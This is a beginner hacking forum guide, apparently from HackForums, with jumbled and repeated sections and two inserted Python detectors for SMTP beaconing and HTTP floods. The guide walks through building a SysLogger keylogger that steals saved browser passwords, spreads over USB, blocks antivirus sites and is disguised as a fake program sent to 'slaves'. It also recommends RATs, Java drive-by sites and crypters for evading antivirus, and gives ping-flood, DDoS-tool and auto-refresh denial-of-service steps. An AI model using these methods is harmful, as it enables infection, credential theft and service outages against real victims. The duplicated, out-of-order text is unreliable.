USB spread = Infects any USB devices plugged into the machine, so if they are put into other computers they will infect them
Startup = Runs the keylogger every time the machine is switched back on
Kill Taskman = Stops the slave opening task manager
Clipboard logger = Saves anything copy/pasted
Screen logger = Sends you a screen shot of the victim's PC
Next we have to tick the box called 'Enable Error'. This will give the slave an error message when they open the file, make sure you put in something creative, but relevant to the fake program.
![[Image: 83Kqa.png]](http://i.imgur.com/83Kqa.png)
Click 'Test Error' to make sure it is working.
![[Image: gHmSR.png]](http://i.imgur.com/gHmSR.png)
Now we need to fill in the mailing options. I recommend using mail as opposed to FTP because it is more secure and its a lot easier. Put in your email address and password. If you are using a Gmail you don't have to change the 'SMTP' options, if you aren't google the SMTP options for your email provider. Click 'test email', if a box pops up saying success, you've done everything right, if not, go back and do it again. There should be a box below that which says 'Interval'. Set that to whatever time you want.
![[Image: 6sJIK.png]](http://i.imgur.com/6sJIK.png)
Now click 'Change file properties'. This will open up another GUI. Find an icon that suits your fake program here
The icon changer might not work for everyone. If it doesn't, download a free icon changer from google.
![[Image: GZmy7.png]](http://i.imgur.com/GZmy7.png)
Close the properties window.
Click 'Build Server'. This will build the keylogging file. Make sure you have your antiviruses disabled as they will delete the file. You can reactivate them when you are done.
Congrats, you've built the keylogger!
Now all you need to do is send it to your slave and get them to open it!
If you accidentally open your keylogger, just open up SysLogger and click 'Cure'. Type in the name of the file and you will be cured.
I hope you guys find this useful!
If you do, please post a thanks.
Hope this helps you guys
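Seen from the defender's side, the mailing options described above (logs sent over SMTP at a fixed 'Interval', from a program that is not a mail client) leave a regular pattern in outbound connection logs. The following is an added example, not part of the original thread: the record format, host names, process names and the allow-list are constructed assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime

SMTP_PORTS = {25, 465, 587}
# Assumption: a site allow-list of approved mail clients. Production rules
# should key on signer or full path rather than the bare process name.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Constructed sample records: timestamp,host,process,dst_ip,dst_port
SAMPLE = """\
2024-01-01T09:00:00Z,WS-014,chrome.exe,192.0.2.80,443
2024-01-01T09:00:03Z,WS-014,invoice_viewer.exe,192.0.2.25,587
2024-01-01T09:01:10Z,WS-014,outlook.exe,192.0.2.30,587
2024-01-01T09:01:40Z,WS-014,outlook.exe,192.0.2.30,587
2024-01-01T09:02:00Z,WS-020,backup_agent.exe,192.0.2.40,25
2024-01-01T09:05:00Z,WS-020,backup_agent.exe,192.0.2.40,25
2024-01-01T09:10:00Z,WS-014,chrome.exe,192.0.2.80,443
2024-01-01T09:10:01Z,WS-014,invoice_viewer.exe,192.0.2.25,587
2024-01-01T09:20:04Z,WS-014,invoice_viewer.exe,192.0.2.25,587
2024-01-01T09:30:02Z,WS-014,invoice_viewer.exe,192.0.2.25,587
2024-01-01T09:40:03Z,WS-014,invoice_viewer.exe,192.0.2.25,587
2024-01-01T09:47:05Z,WS-014,outlook.exe,192.0.2.30,587
2024-01-01T10:40:00Z,WS-020,backup_agent.exe,192.0.2.40,25
2024-01-01T11:12:30Z,WS-014,outlook.exe,192.0.2.30,587
2024-01-01T13:15:00Z,WS-020,backup_agent.exe,192.0.2.40,25
2024-01-01T13:16:00Z,WS-020,backup_agent.exe,192.0.2.40,25
2024-01-01T14:00:00Z,WS-031,updater.exe,192.0.2.50,587
2024-01-01T15:30:00Z,WS-031,updater.exe,192.0.2.50,587
corrupt,record
"""


def parse_record(line):
    """Return (timestamp, host, process, dst_ip, port) or None if malformed."""
    parts = line.strip().split(",")
    if len(parts) != 5:
        return None
    try:
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        port = int(parts[4])
    except ValueError:
        return None
    return ts, parts[1], parts[2], parts[3], port


def find_smtp_beacons(records, min_events=4, max_jitter=0.1):
    """Flag non-mail-client processes that reach SMTP ports at a steady interval.

    Jitter is the standard deviation of the gaps between connections divided
    by their mean; a timer-driven sender stays close to zero.
    """
    seen = defaultdict(list)
    for line in records:
        rec = parse_record(line)
        if rec is None:
            continue
        ts, host, process, _dst, port = rec
        if port in SMTP_PORTS and process.lower() not in MAIL_CLIENTS:
            seen[(host, process)].append(ts)

    findings = []
    for (host, process), times in sorted(seen.items()):
        if len(times) < min_events:
            continue  # too few connections to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            findings.append({
                "host": host,
                "process": process,
                "events": len(times),
                "mean_interval_s": round(mean),
                "jitter": round(jitter, 4),
            })
    return findings


if __name__ == "__main__":
    for finding in find_smtp_beacons(SAMPLE.splitlines()):
        print(finding)
```

Only the constructed `invoice_viewer.exe` record set is reported: the approved mail client is skipped, the irregular sender fails the jitter test, and the process with two connections has too little history.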
SECTION 8 - RAT's
RAT stands for Remote Administration Tool (though some people say it stands for Remote Administration Trojan). You can find a definition of what a RAT is in section 6. As I mentioned in that section, a RAT has a lot more functions than a keylogger. Using a RAT can also allow you to get photos of your slave if they have a webcam. I don't currently have a tutorial on how to use a RAT, so you will have to search for one yourself, sorry about that.
However I do recommend the following RAT's:
• Dark comet (free)
• Blue banana (paid, but very cheap)
They are very easy to use and have many useful functions. In my opinion I think those are the best RAT's around (that don't cost too much).
SECTION 9 - Java Driveby's
Java driveby's (often referred to as JDB's) are the easiest way to infect people with your RAT/keylogger. A detailed definition of a JDB can be found in section 6. But to sum it up in a few words, a JDB is a fake site that uses java to infect people. JDB's are incredibly easy to set up. All they need is a webhost which allows you to upload files. Some good free ones are 000webhost.com and dolphhost.com. I recommend 000webhost because it is easier to use. It also offers free domains.
SECTION 10 – Crypters
Crypters are programs which are used to change the hash sum of a malicious file so that they are not detected by anti-virus programs. Crypters which are FUD are better because they make files completely undetectable. UD crypters make the file mostly undetectable but some programs can still detect it. If you are thinking about setting up a JDB or any other method of spreading your RAT/keylogger, I recommend making your server FUD as it will increase the chances of actually getting slaves. If you want to get a crypter, there are a lot of free ones and paid ones around. I recommend getting a paid one as it will stay FUD for longer.
SECTION 11 - Dosing and DDosing, what's the difference?
People often get confused when they are asked to explain the difference between a dos and a ddos. It even confuses me a little bit but I will try my best to explain it. A dos is a simple denial of service attack. It takes a web page offline for a moment but the attack isn't distributed, so it won't affect everyone. It isn't that effective. However a ddos attack distributes the attack, meaning it will affect other people as well. This is a much more effective way of taking down a site as it will affect more people.
If you want to know how to do either of these, there are a few different methods:
• Dosing program
• DDosing program
• Use cmd to ping the site
• Host booter
• Refreshing the page
I will be going over the following:
- Using a DDosing program (DDos)
- Using cmd to ping the site (Dos)
- Refreshing the page (Dos)
Using a DDosing program: There are a lot of programs that can do this. I recommend one called Goodbye. It's hard hitting and free. To download it go to:http://www.mediafire.com/download.php?9jy6y8t9rjcj4fu
How to use Goodbye: Find the URL of the site you want to DDos. Type in the site and then the page you want the traffic to go to.
Example: Site - website.com Page - /example.htm
Press "Start " to start the attack.
Once the number of blocked packets is above 400 you should stop the attack as anything after that will be redundant (won't have any further effect).
Pinging the site: I couldn't remember this method off the top of my head so I have referenced a post made on NextGenUpdate.
1. Open cmd and type 'ping example.com' ^Replace example.com with the site you want to attack
2. Write down the IP address that shows up.
3. So you would type this in ur cmd: ping XX.XXX.X.XXX -t -l ##
^Replace XX.XXX.X.XXX with the IP address you want to attack
^^Replace ## with the amount of time you want to send the attack for. The longer the attack, the more effective it will be.
4. Allow the process to finish. Check back a bit later to see if the site is down.
Refreshing the page: You are probably thinking I'm an idiot for posting this method, but it's probably not what you expected it to be.
I'd like to point out that this method does not involve:
• Pressing F5
• Clicking refresh
So... You guessed it. We will be using an auto-refresher. I recommend Auto-Refresh Plus in the Chrome webstore. Download it and select custom time. Set it to 1 second. This will reload the page every second, and eventually overload the server. This may take some time.
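On the receiving server, the single-source and multi-source floods this section distinguishes look different in the access log, and so does a client reloading a page once per second. The following is an added example, not part of the original guide, that labels one-minute windows of constructed Common Log Format lines; the thresholds and sample addresses are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Common Log Format prefix: client IP, identity, user, [timestamp], "METHOD path
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (client_ip, timestamp, path), or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path = m.groups()
    try:
        return ip, datetime.strptime(ts, TS_FMT), path
    except ValueError:
        return None


def classify(lines, window_s=60, per_ip_limit=30, total_limit=300, top_share=0.5):
    """Group requests into fixed windows and label the windows that look like floods.

    single-source: one client exceeds per_ip_limit and dominates the window.
    distributed:   the window exceeds total_limit with no dominant client.
    All limits are assumed values and must be tuned to the site's normal load.
    """
    buckets = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, _path = parsed
        buckets[int(ts.timestamp()) // window_s][ip] += 1

    findings = []
    for bucket in sorted(buckets):
        per_ip = buckets[bucket]
        total = sum(per_ip.values())
        top_ip, top_count = per_ip.most_common(1)[0]
        if top_count > per_ip_limit and top_count / total >= top_share:
            kind = "single-source"
        elif total > total_limit:
            kind = "distributed"
        else:
            continue
        start = datetime.fromtimestamp(bucket * window_s, tz=timezone.utc)
        findings.append({
            "window_start": start.isoformat(),
            "kind": kind,
            "total": total,
            "sources": len(per_ip),
            "top_ip": top_ip,
            "top_count": top_count,
        })
    return findings


def build_sample():
    """Constructed log: ordinary traffic, one reloading client, then many sources."""
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)

    def line(ip, when, path="/"):
        return f'{ip} - - [{when.strftime(TS_FMT)}] "GET {path} HTTP/1.1" 200 512'

    lines = []
    # Minute 0: ten visitors, one request each.
    for i in range(10):
        lines.append(line(f"192.0.2.{i + 1}", base + timedelta(seconds=i * 5)))
    # Minute 1: one client requesting the same page every second, plus visitors.
    for s in range(60):
        lines.append(line("198.51.100.7", base + timedelta(minutes=1, seconds=s),
                          "/example.htm"))
    for i in range(5):
        lines.append(line(f"192.0.2.{i + 1}", base + timedelta(minutes=1, seconds=i * 10)))
    # Minute 2: 200 sources with three requests each; none stands out alone.
    for i in range(200):
        for k in range(3):
            when = base + timedelta(minutes=2, seconds=(i + 20 * k) % 60)
            lines.append(line(f"203.0.113.{i + 1}", when))
    lines.append("truncated or corrupt entry")
    return lines


if __name__ == "__main__":
    for finding in classify(build_sample()):
        print(finding)
```

A per-client limit alone catches the second window but misses the third, which is why the total per window is tracked separately.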
SECTION 12 - Staying anonymous
Staying anonymous while online is something that many people can't seem to do. Every day, I go on HF and look through the beginner hacking section. And every time I see 10-20 threads all asking the same sort of thing. "How to hide IP?" "Change IP?" "Free VPN?" "How to staying anonymous?". And I always see the same replies. "Damn kid. Doesn't even know how to use a proxy" "We are not your army" "Ever heard of this magical thing called Google?" "Use the search button before posting". For those of you that encounter that sort of thing, I hope the following sections answer your questions. First off, why is it important to stay anonymous? Well, this question shouldn't really need answering. If you don't stay anonymous, you're effectively allowing people to steal your identity. It's important to cover your tracks while online because there will always be somebody there, waiting to exploit even the first slip-up they see. Moral of the story: STAY ANONYMOUS!! The following 4 sections will teach you how to do that.
SECTION 13 – Proxies
Everyone has heard of proxies. Thing is, most people have no idea how to use them. Before I show you how to use a proxy, I will explain a little bit about what a proxy is and what it does. Every network has its own IP address. When you visit a website, it logs your IP address. Now, some websites don't like certain IP addresses to access them. So they block that IP address from accessing the page. What a proxy is, is basically a tunnel that all the traffic from that page goes through. The tunnel sends the traffic to another IP address. This tricks the website into thinking that the IP address at the end of the tunnel is yours, and allows you access to the page. Now that you know what a proxy is, you can set one up. First off, find a proxy (free proxies can be found at http://hidemyass.com). Every (common) browser has proxy settings, so find your browser's proxy settings area. For Google Chrome, go 'Tools'-->'Advanced'-->'LAN options'-->'Proxy settings'. Type in the proxy then select the appropriate settings (e.g. HTTPS or Socks5). Then you need to restart Chrome (just close it then open it again). Go to http://whatismyip.com to check if the proxy is working properly. If it is, it should display a different IP to your actual one.
SECTION 14 - VPN's
Many of you have probably heard of VPN's before. For those of you who don't know what they are, VPN's are Virtual Private Networks. A detailed explanation of what they are can be found in section 6. Connecting to a VPN is really easy.
I will teach you how to connect to a VPN on:
• Your PC
• Your iDevice
Before I teach you how to do that, you will need to find a VPN to use. Here is a list of VPN's you might want to try.
Free VPN's:
• http://bestcanadavpn.com Best Canada VPN
• http://hideme.ru HideMe.ru
• http://hotspotshield.com Hotspot Shield
Paid VPN's:
• http://hidemyass.com HideMyAss
• http://nvpn.com nVPN
• http://openvpn.net OpenVPN
How to connect to a VPN on your PC:
This will teach you how to connect to a VPN on your PC.
- Click on the WiFi icon on the taskbar.
- Select the option ‘Open Network and Sharing Center’
- Click ‘Connect to a new connection or network’
- Select ‘Connect to a workplace’ and then click next
- Click next
- Select ‘Use my internet (VPN)’
- Type in the address of the VPN you want to connect to
- Type in the username and password then click Connect
- You should see the screen
You’re done! This should appear.
How to set up a VPN on your iDevice:
Here's how to connect to a VPN using your iDevice. For this tutorial we will be using the free VPN, BestCanadaVPN. I will be going over all the steps needed to set this up and a few other things.
- First off, you need to open up settings.
- Now go "General"-->"Network"-->"VPN"
- Now tap the "Add VPN configuration" button. It will bring up this menu.
- Now fill in the boxes with these.
Description: VPN
Server: bestcanadavpn.com
Account: free
Secret: (put anything here)
- Now we need to get the password. So open up safari and head over to bestcanadavpn.com. You will see the password on the homepage.
- Now type the password into the "Password" box in the VPN configuration.
- Now tap "Save".
Congratulations! You have just set up the VPN on your iDevice! Now you need to connect to it. To do that just press the "On" button. Once you are connected, it will say so and a VPN icon will appear in the status bar.
***PLEASE NOTE*** The VPN password changes every 24 hours.
Using a VPN will provide a significant amount more protection than a proxy, but won't make you completely untraceable.
SECTION 15 – Alternatives, tips and tricks
This section will cover some of the alternatives to proxies and VPN's. These methods are probably a little bit harder to use, but they are just as good (if not better).
Change your IP
Most routers have a setting which allows you to clone your MAC address and set it as your IP address. This allows you to hide your location and disguise it as.
Use anonymous web searches
Some sites offer anonymous web searches. This doesn't offer very good anonymity, but hey, it's better than nothing.
Ctrl+Shift+Delete
This amazing little shortcut can clear cookies and data, web history and autofill data incredibly quickly! It's great and takes almost no time to do.
Put Tor on a USB
Tor is a network which provides anonymity while on the Internet. Most schools will not allow you to download it and install it. So just download it onto a USB at home and run it when you get to school. Your school won't have a clue what you are doing online!
Use private browsing
Most browsers have a private browsing option. This opens up a session which doesn't save cookies, and can't be tracked in an administrator system. It's great because anyone can use it.
Double Desktop Switcher
Yup, everyone knows this one, but it does work! Download Double Desktop Switcher onto a USB and bring it to school. You can do whatever you want and when a teacher walks by just press the hotkey to change screens.
Use your mobile/iPod
Most schools think they are smart and monitor all the traffic on their computers. The reality is that they are dumb idiots as they don't monitor mobile traffic. I have downloaded torrents and done a whole bunch of stuff on my iPod and my school hadn't had a clue!
Use public computers
Don't do hacking stuff from home. Go to an Internet cafe or the library. Bring all your stuff on a USB and run it from that.
Combine methods
If you seriously want to stay safe while online, try this: Go to a public place and use a public computer. Sign in with fake information. Connect to a paid VPN. Go online using private browsing. Then set up your browser so it uses a paid web proxy. Open up Tor on your USB. Go to a site which offers anonymous web searching.
With all of that, your Internet will probably be so slow it's unbearable, but you will be anonymous!!!! Oh yeah... did I mention that all of these will slow your internet connection speed? No? Too bad.
I’m kidding. They will slow down your connection, but not by very much, so the trade-off is worth it.
SECTION 16 – Extending your knowledge
“Don’t learn to hack, hack to learn”. You’ve probably seen that posted all around the internet. To a certain extent, it’s true. Hacking is often used to gain knowledge you wouldn’t otherwise be able to know. However if you don’t learn to hack, how can you hack?
This section will help you discover ways to extend your knowledge of hacking. Now, in order to do this, you will need to spend extensive amounts of time browsing the internet. There’s no other way. There are also no shortcuts. If you don’t put in the work, you won’t get the results. End of story.
Now that we’ve got that out of the way, let’s begin.
Since you’re probably too lazy to use google, here are some useful sites:
• Hackforums.net
• Crackhackforum.com
• Hackthissite.org
Those are pretty much the only sites you will need to start off with. They have almost ENDLESS supplies of knowledge, and have relatively friendly members. Sign up for those sites and you’ll be well on your way to becoming a successful hacker.
SECTION 17 – Closing section
Congratulations, you’ve finally reached the last section! I bet it took you a while to read through all of that, but you’ve probably learned a lot too. Now most of my knowledge has been passed down to you. I put a lot of time and effort into typing this up (7 hours to be more precise), and spell-checked this over 50 times. I even added images in (lucky you) so this guide would be easy to follow. So please, post a short thank you message in the original thread. That takes 30 seconds, this took 7 hours.
Remember, knowledge is power. But if you misuse that power it will be taken away from you. Stay true to yourself and the world will do so as well.
1) Introduction
2) The hacker manifesto
3) What is hacking?
4) Choosing your path
5) Where should I start?
6) Basic terminology
7) Keylogging
8) RAT's
9) Java Driveby's
10) Crypters
11) Dosing and DDosing, what's the difference?
12) Staying anonymous
13) Proxies
14) VPN's
15) Alternatives, tips and tricks
16) Extending your knowledge
17) Closing section
SECTION 1 – Introduction
Hi there. If you are reading this, you're either an eager to learn beginner hacker, or an upgraded member here to judge my work. Well, in either case, I'm sure you will enjoy this thread and increase your knowledge of hacking. I will be going over ALL the basics of hacking, and a lot more. I've included tutorials as well, so you could say this is an all-in-one guide.
SECTION 2 - The hacker manifesto
The hacker manifesto (also known as the conscience of a hacker) is an essay written by a hacker known as 'The Mentor'. It is often said to give an insight into the psychology of hackers. If you are hoping to start learning the art of hacking, this will certainly give you the right mindset for the job. "The Hacker Manifesto by +++The Mentor+++ Written January 8, 1986 Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. 
They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike."
– Taken from http://www.mithral.com/~beberg/manifesto.html
That is the essay. It's quite impressive isn't it? After reading it you should have an idea of the mindset any hacker should have. I read it about 5 months ago and it has certainly sent me on the right track.
SECTION 3 - What is hacking?
What is hacking? Well, whatishacking.org defines it as "the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker. Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them." - Taken from whatishacking.org
That's a great definition but in my opinion hacking is much more than that. In my opinion, hacking isn't something you can just 'learn'. It's not just a skill, it's an art. Hacking requires knowledge. Knowledge is power. In order to gain said knowledge, and the power that comes with it, a change of lifestyle is required, along with a certain amount of secrecy. Learning 'how' to hack takes time and dedication. There's no easy way to get better at it. That's right, no shortcuts and it's unlikely you're going to get a helping hand. Like everything else in life, it takes practice. Don't go crying to others if it doesn't work out, just keep calm and carry on. If you are serious about becoming a hacker, you will need to be willing to change your lifestyle, and dedicate yourself to the task. With enough dedication and hard work you will excel at hacking.
SECTION 4 - Choosing your path
Ask any stranger what a hacker is, they will probably give you a really negative answer; identity theft, hacking accounts, stealing, to name a few. The reality is actually quite different. There are a few kinds of hackers, you probably only know about the bad ones. This section should give you a better understanding of the different kinds of hackers, and help you decide which kind you should become.
Black hat hackers: These are the bad guys you always hear about. These are the people giving other hackers a bad name. Black hat hackers are the ones who commit crime. They steal identities, hack accounts, ddos sites and just go about causing havoc.
Grey hat hackers: Grey hats are basically good guys. They still do illegal stuff, but they report it to the person/company they are targeting. So... Basically they do bad stuff and help people to fix it.
White hat hackers: White hat hackers are the good guys. They fix stuff and help people. They don't do illegal stuff. You've probably never heard of an event where a hacker does something good but these guys do that all the time.
Examples of white hat hackers are:
• Technicians
• Cyber security teams
• IT consultants
Now that you have a better understanding of the 'types' of hackers, you need to choose your path. This requires a lot of thinking, because you need to consider the possibilities of each path. Black hat is the easiest path to choose. It's 'fun' and it has the most benefits. It also is the only one that will get you in trouble and maybe even arrested. Grey hat is a slightly more difficult path. You (technically) are a good guy but most people won't see you as such. Grey hats have a hard time because although they are trying to help, the method they are using isn't really that legal. If you do choose to be a Grey hat, be aware that some people won't believe you are really trying to help, and you may still get in trouble. The last and most difficult path is White hat. As I mentioned before, White hats are the good guys. Their job is to help. Becoming a White hat may seem boring but you are helping people, and that should be a reward in itself. The only problem with becoming a What hat is that you will have to start out as a Black hat. I personally would recommend that you start out as a Grey hat. You'll get more out of it.
SECTION 5 - Where should I start?
This is the question that most people ask. I honestly don't think there is any one place to start. Ask around on any forum and people will always tell you to learn to use RAT's and keyloggers. To be honest I wouldn't recommend doing that straight away. I would advise to learn the basic terminologies of hacking (see section 6) and try to get an idea of exactly what everything means. It's really important to understand stuff before you go downloading random hacking programs from the Internet. It you don't know how to use them, or if they are viruses, you only have yourself to blame.
SECTION 6 - Basic terminology
As I mentioned in the previous section, it is important to have a decent amount of knowledge about hacking before you can start. So I've taken the liberty of typing up a list of common terminologies you should know.
Common terminologies:
Ddos - Distributed denial of service attack. This is where a website is flooded with packets of data from multiple sources and the server basically overloads. Ddos attacks are often confused with Dos attacks.
Dos - Denial of service attack. This is where a site is flooded with packets of data from a single source. A Dos isn't as effective as a ddos, but it is a lot easier, as you can Dos straight from cmd.
404 Error - The error you are given when a site is down. If you have attacked a site and don't see this, your attack wasn't successful.
cmd - Command prompt. This is basically MS-Dos, except it's now just a program with some commands rather than an OS. Cmd can be used to perform tasks using commands.
.bat - Batch file extension. This is the file type which is opened in cmd. Most .bat's that you will see online will be malicious. Some are good though.
RAT - Remote Administration Tool. RAT's are the most commonly used tools by beginner hackers. RAT's are favored because they are easy to use and they perform many functions. They also allow control over of the infected computer, which makes them very popular. Slave - A user which has been infected with your keylogger/RAT.
Keylogger - A program which logs the keystrokes of a computer. These are usually the first things that beginner hackers learn to use. They have a lot of functions but they aren't as good as RAT's.
Crypter - A program used to change the hash sum of a malicious program so that it is undetectable by anti-virus programs.
FUD - Fully UnDetectable. A program which is FUD cannot be detected by ANY anti-virus program.
UD - UnDetectable. A program which is UD is mostly undetectable but can be detected by some anti-virus programs.
JDB - Java Driveby. A fake site which contains a java applet. This java applet is used to download and execute (run) a certain program. The slave has to click the 'allow plugin to run' button to start the applet.
Silent Java Driveby - A java driveby that downloads and executes a file without the user seeing any pop-ups. These are more effective than normal java driveby's as they are less suspicious.
Direct link - The direct download link to a certain file. When you download a file from a site (e.g. Mediafire), you are given a download link which redirects you to a page with a download button. However a direct link is a link which leads directly to the file. There is no download button, the download starts straight away.
FTP - File Transfer Protocol. An FTP server is a server used to store and send files.
OS - Operating system
vb - Microsoft Visual Basic. This is a coding language used to make a lot of programs.
.NET - Microsoft .NET framework. This is another coding language made by Microsoft. It is used to create programs.
C/C+/C++/C# - Commonly used coding languages. They are often used to code games.
IP address - The address used to identify your network while on the Internet. Every computer has a different IP address, and therefore every IP address is unique.
VPN - Virtual Private Network. This is a network you can connect to on a computer. It will give you anonymity while online. A VPN will hide your IP address by tricking sites and programs into thinking you are somewhere you are not.
Proxy - A proxy redirects web traffic through a virtual tunnel to another IP address. A proxy is like a VPN but only tricks websites, not the whole computer.
That may seem like a lot of things to remember, but it's not that much considering those are just the basics. Don't let that put you off learning though, once you start to learn one thing, another will follow and so on and so forth.
Keylogging
Keylogging is one of the most basic things in hacking. I explained what a keylogger is in section 6. Downloading a good, free keylogger isn't that hard to do. Just search around HackForums and you will find one in about 30 seconds. I would recommend using SysLogger as it is free and really easy to use. It has many features and allows for the logs to be sent via Email or an FTP server. SysLogger has a really nice interface, so you should be able to figure out how to use it. However if you can't figure it out, or would like to know how to use it before getting it, here is a tutorial I typed up a while ago:
Are your friends bothering you? Need to get back at someone? Or do you just want to learn some of the basics of hacking accounts? In any case, this thread will be INCREDIBLY useful to you.
First of all, here's what this method will require and what it will involve:
- Computer (duhh)
- Internet connection
- Keylogger, we will be using one called SysLogger
- Target
- Making a fake program that the target will want to open
- An email (preferably a Gmail)
So, let's get started.
First thing you will need is SysLogger. You can download it at the bottom of the thread.
Open it up. You will be given a message, just click 'OK'.
![[Image: blAuM.png]](http://i.imgur.com/blAuM.png)
It should open up the GUI.
![[Image: iMtab.png]](http://i.imgur.com/iMtab.png)
Tick the following boxes:
- Encrypt email
- Stealers
- Delete cookies
- Block AV sites
- USB spread
- Startup
- Kill Taskman (optional, leave blank if you want this to be more stealthy)
- Force steam
- Clipboard logger
- Screen logger
![[Image: tvzP9.png]](http://i.imgur.com/tvzP9.png)
Those options will do the following:
Stealers = Sends you saved passwords for internet browsers
Block AV site = Stops the slave from checking an antivirus site if they get suspicious
USB spread = Infects any USB devices plugged into the machine, so if they are put into other computers they will infect them
Startup = Runs the keylogger every time the machine is switched back on
Kill Taskman = Stops the slave opening task manager
Clipboard logger = Saves anything copy/pasted
Screen logger = Sends you a screen shot of the victim's PC
Next we have to tick the box called 'Enable Error'. This will give the slave an error message when they open the file, make sure you put in something creative, but relevant to the fake program.
![[Image: 83Kqa.png]](http://i.imgur.com/83Kqa.png)
Click 'Test Error' to make sure it is working.
![[Image: gHmSR.png]](http://i.imgur.com/gHmSR.png)
Now we need to fill in the mailing options. I recommend using mail as opposed to FTP because it is more secure and its a lot easier. Put in your email address and password. If you are using a Gmail you don't have to change the 'SMTP' options, if you aren't google the SMTP options for your email provider. Click 'test email', if a box pops up saying success, you've done everything right, if not, go back and do it again. There should be a box below that which says 'Interval'. Set that to whatever time you want.
![[Image: 6sJIK.png]](http://i.imgur.com/6sJIK.png)
Now click 'Change file properties'. This will open up another GUI. Find an icon that suits your fake program here
The icon changer might not work for everyone. If it doesn't, download a free icon changer from google.
![[Image: GZmy7.png]](http://i.imgur.com/GZmy7.png)
Close the properties window.
Click 'Build Server'. This will build the keylogging file. Make sure you have your antiviruses disabled as they will delete the file. You can reactivate them when you are done.
Congrats, you've built the keylogger!
Now all you need to do is send it to your slave and get them to open it!
If you accidentally open your keylogger, just open up SysLogger and click 'Cure'. Type in the name of the file and you will be cured.
I hope you guys find this useful!
If you do, please post a thanks.
Hope this helps you guys
SECTION 8 - RAT's
RAT stands for Remote Administration Tool (though some people say it stands for Remote Administration Trojan). You can find a definition of what a RAT is in section 6. As I mentioned in that section, a RAT has a lot more functions than a keylogger. Using a RAT can also allow you to get photos of your slave if they have a webcam. I don't currently have a tutorial on how to use a RAT, so you will have to search for one yourself, sorry about that.
However I do recommend the following RAT's:
• Dark comet (free)
• Blue banana (paid, but very cheap)
They are very easy to use and have many useful functions. In my opinion I think those are the best RAT's around (that don't cost too much).
SECTION 9 - Java Driveby's
Java driveby's (often referred to as JDB's) are the easiest way to infect people with your RAT/keylogger. A detailed definition of a JDB can be found in section 6. But to sum it up in a few words, a JDB is a fake site that uses java to infect people. JDB's are incredibly easy to set up. All they need is a webhost which allows you to upload files. Some good free ones are 000webhost.com and dolphhost.com. I recommend 000webhost because it is easier to use. It also offers free domains.
SECTION 10 – Crypters
Crypters are programs which are used to change the hash sum of a malicious file so that they are not detected by anti-virus programs. Crypters which are FUD are better because they make files completely undetectable. UD crypters make the file mostly undetectable but some programs can still detect it. If you are thinking about setting up a JDB or any other method of spreading your RAT/keylogger, I recommend making your server FUD as it will increase the chances of actually getting slaves. If you want to get a crypter, there are a lot of free ones and paid ones around. I recommend getting a paid one as it will stay FUD for longer.
SECTION 11 - Dosing and DDosing, what's the difference?
People often get confused when they are asked to explain the difference between a dos and a ddos. It even confuses me a little bit but I will try my best to explain it. A dos is a simple denial of service attack. It takes a web page offline for a moment but the attack isn't distributed, so it won't affect everyone. It isn't that effective. However a ddos attack distributes the attack, meaning it will affect other people as well. This is a much more effective way of taking down a site as it will affect more people.
If you want to know how to do either of these, there are a few different methods:
• Dosing program
• DDosing program
• Use cmd to ping the site
• Host booter
• Refreshing the page
I will be going over the following:
- Using a DDosing program (DDos)
- Using cmd to ping the site (Dos)
- Refreshing the page (Dos)
Using a DDosing program: There are a lot of programs that can do this. I recommend one called Goodbye. It's hard hitting and free. To download it go to:http://www.mediafire.com/download.php?9jy6y8t9rjcj4fu
How to use Goodbye: Find the URL of the site you want to DDos. Type in the site and then the page you want the traffic to go to.
